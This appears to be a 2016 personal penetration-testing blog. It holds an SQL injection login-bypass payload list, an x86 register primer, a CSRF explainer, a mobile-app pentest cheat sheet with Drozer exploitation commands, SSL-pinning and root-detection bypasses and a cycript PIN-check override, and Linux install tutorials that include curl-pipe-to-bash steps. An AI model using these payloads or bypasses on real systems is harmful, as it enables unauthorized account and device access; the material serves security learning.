Sunday, April 17, 2016

SQL Injection Authentication Bypass Cheat Sheet

During a penetration test i sometimes find myself testing for SQL injection authentication bypass within a web application and i got tired of search all over the place looking for different payloads, so i decided to create my own payload list. Hopefully someone who comes across this list might find it useful, and remember this is a growing list that i plan on expanding on. So enjoy happy payloading.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Friday, April 8, 2016

Understanding x86 Registers

Good Morning all just getting in a reversing state of mind and as im going
through my OSCP journey just wanted to talk about x86 registers since this is
something that you will need to understand in order to learn exploit
development. well enough rambling from me lets get into it.

x86 Registers

The main tools to write programs in x86 assembly are the processor registers. The registers are like variables built in the processor. Using registers instead of memory to store values makes the process faster and cleaner. The problem with the x86 serie of processors is that there are few registers to use. This section describes the main use of each register and ways to use them. That in note that the rules described here are more suggestions than strict rules. Some operations need absolutely some kind of registers but most of the you can use any of the freely.

Here is a list of the available registers on the 386 and higher processors. This list shows the 32 bit registers. Most of the can be broken down to 16 or even 8 bits register.

General registers

Segment registers

Index and pointers


General registers
As the title says, general register are the one we use most of the time Most of the instructions perform on these registers. They all can be broken down into 16 and 8 bit registers.

32 bits :  EAX EBX ECX EDX
16 bits : AX BX CX DX
 8 bits : AH AL BH BL CH CL DH DL

The "H" and "L" suffix on the 8 bit registers stand for high byte and low byte. With this out of the way, let's see their individual main use

EAX,AX,AH,AL : Called the Accumulator register.
               It is used for I/O port access, arithmetic, interrupt calls,

EBX,BX,BH,BL : Called the Base register
               It is used as a base pointer for memory access
               Gets some interrupt return values

ECX,CX,CH,CL : Called the Counter register
               It is used as a loop counter and for shifts
               Gets some interrupt values

EDX,DX,DH,DL : Called the Data register
               It is used for I/O port access, arithmetic, some interrupt

Segment registers

Segment registers hold the segment address of various items. They are only available in 16 values. They can only be set by a general register or special instructions. Some of them are critical for the good execution of the program and you might want to consider playing with them when you'll be ready for multi-segment programming

CS         : Holds the Code segment in which your program runs.
             Changing its value might make the computer hang.

DS         : Holds the Data segment that your program accesses.
             Changing its value might give erronous data.

ES,FS,GS   : These are extra segment registers available for
             far pointer addressing like video memory and such.

SS         : Holds the Stack segment your program uses.
             Sometimes has the same value as DS.
             Changing its value can give unpredictable results,
             mostly data related.

Indexes and pointers

Indexes and pointer and the offset part of and address. They have various uses but each register has a specific function. They some time used with a segment register to point to far address (in a 1Mb range). The register with an "E" prefix can only be used in protected mode.

ES:EDI EDI DI : Destination index register
                Used for string, memory array copying and setting and
                for far pointer addressing with ES

DS:ESI EDI SI : Source index register
                Used for string and memory array copying

SS:EBP EBP BP : Stack Base pointer register
                Holds the base address of the stack
SS:ESP ESP SP : Stack pointer register
                Holds the top address of the stack

CS:EIP EIP IP : Index Pointer
                Holds the offset of the next instruction
                It can only be read

The EFLAGS register

The EFLAGS register hold the state of the processor. It is modified by many intructions and is used for comparing some parameters, conditional loops and conditionnal jumps. Each bit holds the state of specific parameter of the last instruction. Here is a listing :

Bit   Label    Desciption
0      CF      Carry flag
2      PF      Parity flag
4      AF      Auxiliary carry flag
6      ZF      Zero flag
7      SF      Sign flag
8      TF      Trap flag
9      IF      Interrupt enable flag
10     DF      Direction flag
11     OF      Overflow flag
12-13  IOPL    I/O Priviledge level
14     NT      Nested task flag
16     RF      Resume flag
17     VM      Virtual 8086 mode flag
18     AC      Alignment check flag (486+)
19     VIF     Virutal interrupt flag
20     VIP     Virtual interrupt pending flag
21     ID      ID flag

Those that are not listed are reserved by Intel.

Undocumented registers

There are registers on the 80386 and higher processors that are not well documented by Intel. These are divided in control registers, debug registers, test registers and protected mode segmentation registers. As far as I know, the control registers, along with the segmentation registers, are used in protected mode programming, all of these registers are available on 80386 and higher processors except the test registers that have been removed on the pentium. Control registers are CR0 to CR4, Debug registers are DR0 to DR7, test registers are TR3 to TR7 and the protected mode segmentation registers are GDTR (Global Descriptor Table Register), IDTR (Interrupt Descriptor Table Register), LDTR (Local DTR), and TR.

Monday, March 28, 2016

Understanding Cross-Site Request Forgery (CSRF)

This is just a quick guide to Understanding Cross-Site Request Forgery and how it works and how can it be prevented.  So without wasting any more time lets get to it :).

So What is Cross-Site Request Forgery  RARRRRRRRRRR

Cross-Site Request Forgery (CSRF) is an attack outlined in the OWASP Top 10 whereby a malicious website will send a request to a web application that a user is already authenticated against from a different website. This way an attacker can access functionality in a target web application via the victim's already authenticated browser. Targets include web applications like social media, in-browser email clients, online banking and web interfaces for network devices.

Key Concepts of Cross-Site Request Forgery

  • Malicious requests are sent from a site that a user visits to another site that the attacker believes the victim is validated against.
  • The malicious requests are routed to the target site via the victim’s browser, which is authenticated against the target site.
  • The vulnerability lies in the affected web application, not the victim’s browser or the site hosting the CSRF.

Executing a CSRF Attack

In a Cross-Site Request Forgery attack, the attacker is exploiting how the target web application manages authentication. For CSRF to be exploited, the victim must be authenticated against (logged into) the target site. For instance, let’s say I just bought a new home wireless router. Like most wifi routers, it’s configured through a web interface. The router was shipped to me with an internal IP address of I’m having trouble configuring the router though, and fortunately the folks over at have published a guide that shows me exactly what buttons to click in the router interface to get everything set up securely. The attackers have also set up a proxy server at that will log all traffic that goes through it and look for things like passwords and session tokens.

As I clicked through the configuration guide, "I missed the 1x1 pixel image that failed to load:"”
alt=”pwned” height=”1” width=”1”/>

The attackers knew that when I was reading their tutorial, I would be logged into the router interface. So they had the CSRF attack set up in the tutorial. With that request, my router would be reconfigured so that my traffic will be routed to their proxy server where they can do all manner of bad things with it.

Preventing Cross-Site Request Forgery (CSRF) Vulnerabilities

The most common method to prevent Cross-Site Request Forgery (CSRF) attacks is to append unpredictable challenge tokens to each request and associate them with the user’s session. Such tokens should at a minimum be unique per user session, but can also be unique per request. By including a challenge token with each request, the developer can ensure that the request is valid and not coming from a source other than the user.

Finding and Remediating Cross-Site Request Forgery (CSRF) Vulnerabilities

The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.

Thursday, March 24, 2016

Mobile Application Penetration Testing Cheat Sheet

I'm currently on a Journey to learn as much as i can about mobile application penetration testing, during my research i stumbled access a Mobile App Pentest CheatSheet that i wanted to share with others that are on the same  mobile app security journey as i am. The Mobile App Pentest cheat sheet provides a concise collection of high value information on specific mobile application penetration testing topics.

Mobile Application Security Testing Distributions

  • Appie - A portable software package for Android Pentesting and an awesome alternative to existing Virtual machines.
  • Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals.
  • AppUse - AppUse is a VM (Virtual Machine) developed by AppSec Labs.
  • Androl4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis
  • Mobisec - Mobile security testing live environment.
  • Santoku - Santoku is an OS and can be run outside a VM as a standalone operating system.
  • Vezir Project - Mobile Application Pentesting and Malware Analysis Environment.
  • All-in-One Mobile Security Frameworks

All-in-One Mobile Security Frameworks

  • Mobile Security Framework - MobSF - Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis.
  • python runserver

Android Application Penetration Testing

Reverse Engineering and Static Analysis

  • APKInspector - APKinspector is a powerful GUI tool for analysts to analyze the Android applications.
  • APKTool - A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications.
  • Disassembling Android apk file
  • apktool d [apk file]
  • Rebuilding decoded resources back to binary APK/JAR with certificate signing
  • apktool b [modified folder]
  • keytool -genkey -v -keystore keys/test.keystore -alias Test -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000
  • jarsigner -keystore keys/test.keystore dist/test.apk -sigalg SHA1withRSA -digestalg SHA1 Test
  • Sign - Sign.jar automatically signs an apk with the Android test certificate.
  • Jadx - Dex to Java decompiler: Command line and GUI tools for produce Java source code from Android Dex and Apk files.
  • Oat2dex - A tool for converting .oat file to .dex files.
  • Deoptimize boot classes (The output will be in "odex" and "dex" folders)
  • java -jar oat2dex.jar boot [boot.oat file]
  • Deoptimize application
  • java -jar oat2dex.jar [app.odex] [boot-class-folder output from above]
  • Get odex from oat
  • java -jar oat2dex.jar odex [oat file]
  • Get odex smali (with optimized opcode) from oat/odex
  • java -jar oat2dex.jar smali [oat/odex file]
  • FindBugs + FindSecurityBugs - FindSecurityBugs is a extension for FindBugs which include security rules for Java applications.
  • Qark - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs.
  • AndroBugs - AndroBugs Framework is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows.
  • Simplify - A tool for de-obfuscating android package into Classes.dex which can be use Dex2jar and JD-GUI to extract contents of dex file.
  • simplify.jar -i [input smali files or folder] -o [output dex file]
  • ClassNameDeobfuscator - Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.
  • Android backup extractor - Utility to extract and repack Android backups created with adb backup (ICS+). Largely based on from AOSP.

Dynamic and Runtime Analysis

  • Cydia Substrate - Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected in to the target process's memory.
  • Xposed Framework - Xposed framework enables you to modify the system or application aspect and behaviour at runtime, without modifying any Android application package(APK) or re-flashing.
  • logcat-color - A colorful and highly configurable alternative to the adb logcat command from the Android SDK.
  • Inspeckage - Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.
  • Frida - The toolkit works using a client-server model and lets you inject in to running processes not just on Android, but also on iOS, Windows and Mac.
  • AndBug - AndBug is a debugger targeting the Android platform's Dalvik virtual machine intended for reverse engineers and developers.
  • Cydia Substrate: Introspy-Android - Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.
  • Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
  • Starting a session
  • adb forward tcp:31415 tcp:31415
  • drozer console connect
  • Retrieving package information
  • run app.package.list -f [app name]
  • run -a [package name]
  • Identifying the attack surface
  • run app.package.attacksurface [package name]
  • Exploiting Activities
  • run -a [package name] -u
  • run app.activity.start --component [package name] [component name]
  • Exploiting Content Provider
  • run -a [package name]
  • run scanner.provider.finduris -a [package name]
  • run app.provider.query [uri]
  • run app.provider.update [uri] --selection [conditions] [selection arg] [column] [data]
  • run scanner.provider.sqltables -a [package name]
  • run scanner.provider.injection -a [package name]
  • run scanner.provider.traversal -a [package name]
  • Exploiting Broadcast Receivers
  • run -a [package name]
  • run app.broadcast.send --component [package name] [component name] --extra [type] [key] [value]
  • run app.broadcast.sniff --action [action]
  • Exploiting Service
  • run -a [package name]
  • run app.service.start --action [action] --component [package name] [component name]
  • run app.service.send [package name] [component name] --msg [what] [arg1] [arg2] --extra [type] [key] [value] --bundle-as-obj

Network Analysis and Server Side Testing

  • Tcpdump - A command line packet capture utility.
  • Wireshark - An open-source packet analyzer.
  • Live packet captures in real time
  • adb shell "tcpdump -s 0 -w - | nc -l -p 4444“
  • adb forward tcp:4444 tcp:4444
  • nc localhost 4444 | sudo wireshark -k -S -i –
  • Canape - A network testing tool for arbitrary protocols.
  • Mallory - A Man in The Middle Tool (MiTM) that use to monitor and manipulate traffic on mobile devices and applications.
  • Burp Suite - Burp Suite is an integrated platform for performing security testing of applications.
  • Proxydroid - Global Proxy App for Android System.

Bypassing Root Detection and SSL Pinning

  • Xposed Module: Just Trust Me - Xposed Module to bypass SSL certificate pinning.
  • Xposed Module: SSLUnpinning - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning).
  • Cydia Substrate Module: Android SSL Trust Killer - Blackbox tool to bypass SSL certificate pinning for most applications running on a device.
  • Cydia Substrate Module: RootCoak Plus - Patch root checking for commonly known indications of root.
  • Android-ssl-bypass - an Android debugging tool that can be used for bypassing SSL, even when certificate pinning is implemented, as well as other debugging tasks. The tool runs as an interactive console.

Security Libraries

  • PublicKey Pinning - Pinning in Android can be accomplished through a custom X509TrustManager. X509TrustManager should perform the customary X509 checks in addition to performing the pinning configuration.
  • Android Pinning - A standalone library project for certificate pinning on Android.
  • Java AES Crypto - A simple Android class for encrypting & decrypting strings, aiming to avoid the classic mistakes that most such classes suffer from.
  • Proguard - ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes.
  • SQL Cipher - SQLCipher is an open source extension to SQLite that provides transparent 256-bit AES encryption of database files.
  • Secure Preferences - Android Shared preference wrapper than encrypts the keys and values of Shared Preferences.
  • Trusted Intents - Library for flexible trusted interactions between Android apps.

iOS Application Penetration Testing

Access Filesystem on iDevice

  • FileZilla - It supports FTP, SFTP, and FTPS (FTP over SSL/TLS).
  • Cyberduck - Libre FTP, SFTP, WebDAV, S3, Azure & OpenStack Swift browser for Mac and Windows.
  • itunnel - Use to forward SSH via USB.
  • iFunbox - The File and App Management Tool for iPhone, iPad & iPod Touch.

Reverse Engineering and Static Analysis

  • otool - The otool command displays specified parts of object files or libraries.
  • Clutch - Decrypted the application and dump specified bundleID into binary or .ipa file.
  • Dumpdecrypted - Dumps decrypted mach-o files from encrypted iPhone applications from memory to disk. This tool is necessary for security researchers to be able to look under the hood of encryption.
  • iPod:~ root# DYLD_INSERT_LIBRARIES=dumpdecrypted.dylib /var/mobile/Applications/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/
  • class-dump - A command-line utility for examining the Objective-C runtime information stored in Mach-O files.
  • Weak Classdump - A Cycript script that generates a header file for the class passed to the function. Most useful when you cannot classdump or dumpdecrypted , when binaries are encrypted etc.
  • iPod:~ root# cycript -p Skype; cycript -p Skype
  • #cy weak_classdump_bundle([NSBundle mainBundle],"/tmp/Skype")
  • IDA Pro - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger that offers so many features it is hard to describe them all.
  • HopperApp - Hopper is a reverse engineering tool for OS X and Linux, that lets you disassemble, decompile and debug your 32/64bits Intel Mac, Linux, Windows and iOS executables.
  • iRET - The iOS Reverse Engineering Toolkit is a toolkit designed to automate many of the common tasks associated with iOS penetration testing.

Dynamic and Runtime Analysis

  • cycript - Cycript allows developers to explore and modify running applications on either iOS or Mac OS X using a hybrid of Objective-C++ and JavaScript syntax through an interactive console that features syntax highlighting and tab completion.
  • Show current view
  • cy# UIApp.keyWindow.rootViewController.topViewController.visibleViewController
  • Get an array of existing objects of a certain class
  • cy# choose(UIViewController)
  • List method at runtime
  • cy# [classname].messages or
  • cy# function printMethods(className) { var count = new new Type("I"); var methods = class_copyMethodList(objc_getClass(className), count); var methodsArray = []; for(var i = 0; i < *count; i++) { var method = methods[i]; methodsArray.push({selector:method_getName(method), implementation:method_getImplementation(method)}); } free(methods); free(count); return methodsArray; }
  • cy# printMethods("[classname]")
  • Prints out all the instance variables
  • cy# function tryPrintIvars(a){ var x={}; for(i in a){ try{ x[i] = (a)[i]; } catch(e){} } return x; }
  • cy# a=#0x15d0db80
  • cy# tryPrintIvars(a)
  • Manipulating through property
  • cy# [a pinCode]
  • cy# [a setPinCode: @"1234"]
  • cy# [a isValidPin]
  • cy# a->isa.messages['isValidPin'] = function(){return 1;}
  • iNalyzer - AppSec Labs iNalyzer is a framework for manipulating iOS applications, tampering with parameters and method.
  • idb - idb is a tool to simplify some common tasks for iOS pentesting and research.
  • snoop-it - A tool to assist security assessments and dynamic analysis of iOS Apps.
  • Introspy-iOS - Blackbox tool to help understand what an iOS application is doing at runtime and assist in the identification of potential security issues.
  • gdb - A tool to perform runtime analysis of IOS applications.
  • keychaindumper - A tool to check which keychain items are available to an attacker once an iOS device has been jailbroken.
  • BinaryCookieReader - A tool to dump all the cookies from the binary Cookies.binarycookies file.

Network Analysis and Server Side Testing

  • Canape - A network testing tool for arbitrary protocols.
  • Mallory - A Man in The Middle Tool (MiTM) that use to monitor and manipulate traffic on mobile devices and applications.
  • Burp Suite - Burp Suite is an integrated platform for performing security testing of applications.
  • Charles Proxy - HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet.

Bypassing Root Detection and SSL Pinning

  • SSL Kill Switch 2 - Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps.
  • iOS TrustMe - Disable certificate trust checks on iOS devices.
  • Xcon - A tool for bypassing Jailbreak detection.
  • tsProtector - Another tool for bypassing Jailbreak detection.

Security Libraries

  • PublicKey Pinning - iOS pinning is performed through a NSURLConnectionDelegate. The delegate must implement connection:canAuthenticateAgainstProtectionSpace: and connection:didReceiveAuthenticationChallenge:. Within connection:didReceiveAuthenticationChallenge:, the delegate must call SecTrustEvaluate to perform customary X509 checks.

Wednesday, February 17, 2016

Practice CTF List / Permanant CTF List

I'm on a mission to becoming a great penetration tester. This is a list of CTF's 
Note: some links might or might not work so just try them. 

Live Online Games


Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.



Webapp Specific

Forensics Specific


Paid Training

Downloadable Offline Games

Virtual Machines

Inactive or Gone

Just around for historical sake, or on the off-chance they come back.

Monday, February 15, 2016

How to install Ruby on Rails on CentOS 6

This is a quick tutorial on how to install Ruby on Rails on CentOS 6. Before installing Ruby on Rail just want to briefly explain what Ruby on Rails is. Ruby on Rails is an application stack that provides web developers with a framework to quickly create a web application. All right well enough jabbering lets get on with the installation.

Installing Ruby 2.18 using rvm.
NOTE: by default ruby 1.8.7 is installed on centos 6.

Step 1. Install the required packages
# yum install gcc-c++ patch readline readline-devel zlib zlib-devel 
# yum install libyaml-devel libffi-devel openssl-devel make 
# yum install bzip2 autoconf automake libtool bison iconv-devel sqlite-devel
Step 2. Install the latest version of RVM
# curl -L | bash -s stable
# cd tar -xzvf /usr/local/rvm/archives/rvm-1.26.11.tgz
# cd /usr/local/rvm/archives/rvm-1.26.11/binscripts
# ./rvm-installer
Step 3.  Setup the RVM Environment 
# source /etc/profile.d/
Step 4. Install ruby 
# rvm install 2.1.8

Step 5.  Configure the Default version of Ruby 
# rvm use 2.1.8 --default

Using /usr/local/rvm/gems/ruby-2.1.8

Step 6.  Check the current version of Ruby 

# ruby --version

ruby 2.1.8p440 (2015-12-16 revision 53160) [x86_64-linux]

Install Rails 
#gem install rails -V
Create a Test Application (Optional) to verify that Rails is working properly
NOTE: After running the rails server --binding= the following error might pop up " There was an error while trying to load the gem 'uglifier'" if you see this error you will need to install nodejs. Run the following commands to install nodejs  

curl -sL | bash -
yum install -y nodejs
npm install -g express-generator
npm -g install npm@latest

cd ~

rails new testapp 
The move into the applications directory 
# cd testapp
Create the sqlite3 database:
rake db:create 
http://server ip address:3000

Sunday, February 14, 2016

Upgrading from Kali Linux 2.0(sana) to Kali Linux rolling edition

I've been putting a lot of things off as of late and upgrading my kali linux has been one of them, but no more :). The is a quick step by step guide on how to upgrading to Kali Linux rolling edition.

Step1. Before doing anything just do a quick apt-get update and apt-get upgrade to apply any outstanding updates to the kali linux 2.0 image.

Step2. Once the updates have been applied. The go ahead and open the /etc/apt/sources.list with your favorite editor (mine being vim) and add the following information to the file.

deb kali-rolling main non-free contrib

Step3.  After adding the above source to the /etc/apt/sources.list file run the following commands and just walk a way and grab some coffee and a pop tart (yum).

apt-get update
apt-get dist-upgrade

Step4. After completing the upgrade and rebooting, when booting into the Kali linux rolling edition you may have to reinstall open-vm-tools-desktop in order to make sure your full screen option works properly with the rolling edition.

Note: After  the upgrade i've noticed a couple of changes

1. the network card changed from eth0 to eno16777736 this is kinda similar to the network card settings in an default centos 7 installation.

2. After upgrading to kali linux rolling my display in full screen mode was still not right. After hours of searching and testing i found the solution that worked for me by running the following commands:

# uninstall vmware tools  (note: I transitioned from Kali 2.0): 

# uninstall open-vm-tools
apt-get remove open-vm-tools-desktop
apt-get autoremove

# install open-vm-tools
apt-get install  open-vm-tools-desktop